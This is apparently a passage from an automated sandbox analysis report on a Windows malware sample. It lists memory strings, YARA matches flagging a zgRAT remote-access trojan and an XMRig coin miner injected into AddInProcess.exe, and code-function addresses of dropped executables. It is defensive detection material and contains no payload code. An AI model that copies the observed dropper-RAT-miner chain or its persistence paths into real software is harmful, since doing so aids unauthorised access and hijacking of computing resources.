Source: powershell.exe, 00000002.00000002.2179820229.0000029DD41C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2185219246.00000270C6928000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2334928126.00000237255F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000A.00000002.2334928126.00000237255F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2179820229.0000029DD3FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2185219246.00000270C6701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2334928126.00000237253D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000A.00000002.3527531392.0000023735444000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.3527531392.0000023735444000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.3527531392.0000023735444000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.2334928126.00000237255F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: e2kLb2J2Y7.exe, 00000000.00000002.2118028441.000000001C660000.00000004.08000000.00040000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000014061000.00000004.00000800.00020000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000013EB9000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB7893000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB7845000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: e2kLb2J2Y7.exe, 00000000.00000002.2118028441.000000001C660000.00000004.08000000.00040000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000014061000.00000004.00000800.00020000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000013EB9000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB78A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: e2kLb2J2Y7.exe, 00000000.00000002.2118028441.000000001C660000.00000004.08000000.00040000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000014061000.00000004.00000800.00020000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000013EB9000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB7893000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB7845000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: powershell.exe, 00000002.00000002.2491503196.0000029DE4013000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2646332508.00000270D6774000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3527531392.0000023735444000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: e2kLb2J2Y7.exe, 00000000.00000002.2118028441.000000001C660000.00000004.08000000.00040000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000014061000.00000004.00000800.00020000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000013EB9000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB7893000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB7845000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: e2kLb2J2Y7.exe, 00000000.00000002.2113076611.0000000003A81000.00000004.00000800.00020000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2118028441.000000001C660000.00000004.08000000.00040000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000014061000.00000004.00000800.00020000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000013EB9000.00000004.00000800.00020000.00000000.sdmp, Key.exe, 00000004.00000002.2152846444.0000000003D71000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB7893000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB7845000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2278949383.000001EEA70C1000.00000004.00000800.00020000.00000000.sdmp, Values.exe, 0000000C.00000002.2342145252.000002326752E000.00000004.00000800.00020000.00000000.sdmp, zhtyxulkfny.exe, 00000011.00000002.2754160353.0000000003581000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: e2kLb2J2Y7.exe, 00000000.00000002.2118028441.000000001C660000.00000004.08000000.00040000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000014061000.00000004.00000800.00020000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000013EB9000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB7893000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB7845000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: AddInProcess.exe, 00000013.00000002.2395730311.0000000140481000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/benchmark/%s
Source: AddInProcess.exe, 00000013.00000002.2395730311.0000000140481000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/docs/algorithms
Source: AddInProcess.exe, 00000013.00000002.2395730311.00000001404B1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/wizard
Source: AddInProcess.exe, 00000013.00000002.2395730311.00000001404B1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/wizard%s

System Summary

Source: 9.2.xddtyli.exe.1eeb753d320.7.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 9.2.xddtyli.exe.1eebf780000.13.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 9.2.xddtyli.exe.1eeb743d2e8.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 9.2.xddtyli.exe.1eebf780000.13.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 9.2.xddtyli.exe.1eeb743d2e8.8.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 9.2.xddtyli.exe.1eeb753d320.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 9.2.xddtyli.exe.1eeb73bd2b0.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 19.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 19.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 19.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000009.00000002.2709105744.000001EEBF780000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000013.00000002.2395730311.0000000140481000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: AddInProcess.exe PID: 7648, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: e2kLb2J2Y7.exe, Dream.cs Large array initialization: Gzip: array initializer size 599332
Source: 9.2.xddtyli.exe.1eeb753d320.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 9.2.xddtyli.exe.1eebf780000.13.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 9.2.xddtyli.exe.1eeb743d2e8.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 9.2.xddtyli.exe.1eebf780000.13.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 9.2.xddtyli.exe.1eeb743d2e8.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 9.2.xddtyli.exe.1eeb753d320.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 9.2.xddtyli.exe.1eeb73bd2b0.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 19.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 19.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 19.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000009.00000002.2709105744.000001EEBF780000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000013.00000002.2395730311.0000000140481000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: AddInProcess.exe PID: 7648, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD348B04F0 0_2_00007FFD348B04F0
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34971C24 0_2_00007FFD34971C24
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34974106 0_2_00007FFD34974106
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD349736E4 0_2_00007FFD349736E4
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34974344 0_2_00007FFD34974344
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34973C98 0_2_00007FFD34973C98
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD349732A2 0_2_00007FFD349732A2
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34974814 0_2_00007FFD34974814
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34974964 0_2_00007FFD34974964
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A30128 0_2_00007FFD34A30128
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A38248 0_2_00007FFD34A38248
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A3CFA1 0_2_00007FFD34A3CFA1
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A338F2 0_2_00007FFD34A338F2
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A3B86D 0_2_00007FFD34A3B86D
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A3B9F2 0_2_00007FFD34A3B9F2
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A315F2 0_2_00007FFD34A315F2
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A3E651 0_2_00007FFD34A3E651
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A3DE25 0_2_00007FFD34A3DE25
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A31589 0_2_00007FFD34A31589
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A34DD3 0_2_00007FFD34A34DD3
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A392F2 0_2_00007FFD34A392F2
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A3E6FA 0_2_00007FFD34A3E6FA
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A393D3 0_2_00007FFD34A393D3
Source: C:\Users\user\Desktop\e2kLb2J2Y7.exe Code function: 0_2_00007FFD34A3DFA8 0_2_00007FFD34A3DFA8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348CB8FA 2_2_00007FFD348CB8FA
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34961D00 4_2_00007FFD34961D00
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD349636E4 4_2_00007FFD349636E4
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD349642E4 4_2_00007FFD349642E4
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34963C98 4_2_00007FFD34963C98
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34962C5D 4_2_00007FFD34962C5D
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD349632A2 4_2_00007FFD349632A2
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34964A08 4_2_00007FFD34964A08
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A21488 4_2_00007FFD34A21488
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A2CA70 4_2_00007FFD34A2CA70
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A2E4F2 4_2_00007FFD34A2E4F2
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A2C0F8 4_2_00007FFD34A2C0F8
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A2ACC9 4_2_00007FFD34A2ACC9
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A28178 4_2_00007FFD34A28178
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A24D60 4_2_00007FFD34A24D60
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A24D68 4_2_00007FFD34A24D68
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A2B1C5 4_2_00007FFD34A2B1C5
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A22EFD 4_2_00007FFD34A22EFD
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A21290 4_2_00007FFD34A21290
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A21270 4_2_00007FFD34A21270
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A2E2B0 4_2_00007FFD34A2E2B0
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A212A0 4_2_00007FFD34A212A0
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A2E3F2 4_2_00007FFD34A2E3F2
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34881B0F 9_2_00007FFD34881B0F
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34883CD3 9_2_00007FFD34883CD3
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD348842FB 9_2_00007FFD348842FB
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34883AFB 9_2_00007FFD34883AFB
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34881736 9_2_00007FFD34881736
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34883F25 9_2_00007FFD34883F25
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34883758 9_2_00007FFD34883758
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34883B78 9_2_00007FFD34883B78
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34883B90 9_2_00007FFD34883B90
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD348837D3 9_2_00007FFD348837D3
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34883BD3 9_2_00007FFD34883BD3
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34951B44 9_2_00007FFD34951B44
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34953494 9_2_00007FFD34953494
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34953574 9_2_00007FFD34953574
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34953264 9_2_00007FFD34953264
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34951368 9_2_00007FFD34951368
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Code function: 9_2_00007FFD34952BA4 9_2_00007FFD34952BA4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD349930E9 10_2_00007FFD349930E9
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A61ED 12_2_00007FFD348A61ED
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A1A81 12_2_00007FFD348A1A81
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A542D 12_2_00007FFD348A542D
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A6C54 12_2_00007FFD348A6C54
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A5846 12_2_00007FFD348A5846
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A3CD3 12_2_00007FFD348A3CD3
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A15C7 12_2_00007FFD348A15C7
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A62F9 12_2_00007FFD348A62F9
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A3AFB 12_2_00007FFD348A3AFB
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A42FB 12_2_00007FFD348A42FB
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A3F25 12_2_00007FFD348A3F25
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A3758 12_2_00007FFD348A3758
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A6348 12_2_00007FFD348A6348
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A625E 12_2_00007FFD348A625E
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A6281 12_2_00007FFD348A6281
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A1AA0 12_2_00007FFD348A1AA0
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A62C7 12_2_00007FFD348A62C7
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A3B78 12_2_00007FFD348A3B78
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A6371 12_2_00007FFD348A6371
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A3B90 12_2_00007FFD348A3B90
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A63A7 12_2_00007FFD348A63A7
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A37D3 12_2_00007FFD348A37D3
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A3BD3 12_2_00007FFD348A3BD3
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD348A63C7 12_2_00007FFD348A63C7
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD34971C15 12_2_00007FFD34971C15
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD34970951 12_2_00007FFD34970951
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD34973494 12_2_00007FFD34973494
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD34973184 12_2_00007FFD34973184
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD34970804 12_2_00007FFD34970804
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD34970FE8 12_2_00007FFD34970FE8
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Code function: 12_2_00007FFD34971368 12_2_00007FFD34971368
Source: C:\Users\user\AppData\Local\Temp\zhtyxulkfny.exe Code function: 17_2_00007FFD348C1C2D 17_2_00007FFD348C1C2D
Source: C:\Users\user\AppData\Local\Temp\zhtyxulkfny.exe Code function: 17_2_00007FFD34981D00 17_2_00007FFD34981D00
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD348B04F0 21_2_00007FFD348B04F0
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD348BC4A9 21_2_00007FFD348BC4A9
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD348BF93A 21_2_00007FFD348BF93A
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD3490806D 21_2_00007FFD3490806D
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD3490FC52 21_2_00007FFD3490FC52
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD349053D9 21_2_00007FFD349053D9
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD34901FD1 21_2_00007FFD34901FD1
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD34901925 21_2_00007FFD34901925
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD348FF751 21_2_00007FFD348FF751
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD3490AE7D 21_2_00007FFD3490AE7D
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD3490EEA6 21_2_00007FFD3490EEA6
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD348FF7D1 21_2_00007FFD348FF7D1
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD34971D00 21_2_00007FFD34971D00
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD34970F08 21_2_00007FFD34970F08
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD349736E4 21_2_00007FFD349736E4
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD349732A2 21_2_00007FFD349732A2
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 21_2_00007FFD34970644 21_2_00007FFD34970644
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402F1810 22_2_00000001402F1810
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402E780C 22_2_00000001402E780C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EC07B 22_2_00000001402EC07B
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EC8B0 22_2_00000001402EC8B0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EF8B0 22_2_00000001402EF8B0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140307110 22_2_0000000140307110
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140306960 22_2_0000000140306960
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402F9190 22_2_00000001402F9190
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EB991 22_2_00000001402EB991
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402FD9CE 22_2_00000001402FD9CE
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EE9B0 22_2_00000001402EE9B0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001403021C0 22_2_00000001403021C0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402F7260 22_2_00000001402F7260
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402E8A6A 22_2_00000001402E8A6A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EFAE0 22_2_00000001402EFAE0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001402EC30A 22_2_00000001402EC30A
